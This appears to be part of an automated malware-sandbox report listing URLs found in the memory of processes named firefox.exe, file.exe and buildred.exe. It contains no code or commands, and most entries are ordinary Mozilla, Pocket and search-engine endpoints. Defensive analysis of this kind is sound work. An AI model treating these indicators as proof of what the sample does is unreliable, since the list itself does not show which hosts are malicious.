Source: firefox.exe, 00000028.00000003.2783596675.0000026192200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2808523111.0000026192480000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.duckduckgo.com/ac/
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://accounts.firefox.com/settings/clients
Source: firefox.exe, 00000028.00000002.2879465068.0000026181EDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.0000026190794000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/language-tools/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search-engines/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/search?q=%TERMS%&platform=%OS%&appver=%VERSION%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://addons.mozilla.org/%LOCALE%/firefox/themes
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ads.stickyadstv.com/firefox-etp
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://amazon.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://api.accounts.firefox.com/v1
Source: buildred.exe, 0000001A.00000000.2683951657.0000000000802000.00000002.00000001.01000000.00000012.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002C37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/app/firefox-private-safe-browser/id989804926
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://apps.apple.com/us/app/firefox-private-network-vpn/id1489407738
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/GMP/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%OS_VER
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/3/SystemAddons/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aus5.mozilla.org/update/6/%PRODUCT%/%VERSION%/%BUILD_ID%/%BUILD_TARGET%/%LOCALE%/%CHANNEL%/%
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://blocked.cdn.mozilla.net/%blockID%.html
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: firefox.exe, 00000028.00000002.2925172791.0000026194847000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191E3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bugzilla.mo
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-f
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://completion.amazon.com/search/complete?q=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://content.cdn.mozilla.net
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://contile.services.mozilla.com/v1/tiles
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://coverage.mozilla.org
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E30000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2879465068.0000026181E0D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://crash-reports.mozilla.com/submit?id=
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://crash-stats.mozilla.org/report/index/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://dap-02.api.divviup.org
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinations
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://developers.google.com/safe-browsing/v4/advisory
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2946154664.00000DD94BB04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2946900906.00002887A0504000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabS
Source: file.exe, 00000000.00000002.2420117641.0000000002726000.00000004.00000020.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003077000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E47000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003EB8000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.000000000311E000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2939726218.0000000003E12000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.0000000003113000.00000004.00000800.00020000.00000000.sdmp, buildred.exe, 0000001A.00000002.2927923428.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2896637347.0000026191F03000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000028.00000002.2903042607.0000026192673000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EBD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://email.seznam.cz/newMessageScreen?mailto=%s
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-api-proxy.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/networking/dns/trr-skip-reasons.html#
Source: firefox.exe, 00000028.00000002.2890262949.000002618F240000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox-source-docs.mozilla.org/remote/Security.html
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.allizom.org/v1/buckets/main/collections/search-config/recordsor
Source: firefox.exe, 00000028.00000002.2890262949.000002618F2EA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main-preview/collections/search-config/reco
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/records
Source: firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/search-config/recordsjar:f
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://firefox.settings.services.mozilla.com/v1clearCache/this._cacheEntryPromise
Source: firefox.exe, 00000028.00000002.2895347761.0000026191ED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2947331057.00002FA5DCF04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1B2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2893311405.00000261907C2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2889124341.000002618F1FB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://fpn.firefox.com/browser?utm_source=firefox-desktop&utm_medium=referral&utm_campaign=about-pr
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ftp.mozilla.org/pub/labs/devtools/adb-extension/#OS#/adb-extension-latest-#OS#.xpi
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/firefox/trending-topics?version=2&consumer_key=$apiKey&locale_l
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=$apiKey&layout_variant=bas
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.cdn.mozilla.net/v3/newtab/layout?version=1&consumer_key=40249-e88c401e1b1f2242d9e4
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/career?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/entertainment?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/food?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/health?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/science?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/self-improvement?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/technology?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore/trending?src=fx_new_tab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/explore?utm_source=pocket-newtab
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/firefox/new_tab_learn_more
Source: firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://getpocket.com/recommendations
Source: firefox.exe, 00000028.00000002.2902841572.0000026192503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/
Source: firefox.exe, 00000028.00000003.2783596675.0000026192200000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2802994667.000002619243D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2804346319.000002619245F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895161216.0000026191D70000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F27E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000003.2796627248.000002619241C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://google.com
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000028.00000002.2879465068.0000026181E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000028.00000002.2890262949.000002618F203000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881The
Source: firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000028.00000002.2882551286.000002618E6AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000002F.00000002.2852547493.00000130BDACA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000028.00000002.2893311405.00000261907D6000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2882039704.000002618E490000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000002F.00000002.2855904558.00000130BDB60000.00000002.10000000.00040000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000028.00000002.2895347761.0000026191E1A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000028.00000002.2895347761.0000026191EAD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
